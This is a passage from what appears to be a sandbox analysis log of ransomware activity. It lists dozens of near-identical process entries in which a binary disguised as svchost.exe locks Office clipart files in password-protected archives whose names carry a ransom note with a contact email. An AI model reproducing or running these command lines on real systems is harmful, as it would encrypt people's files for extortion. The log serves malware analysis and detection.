  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2100
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1028
- C:\ProgramData\msvkp\svchost.exe
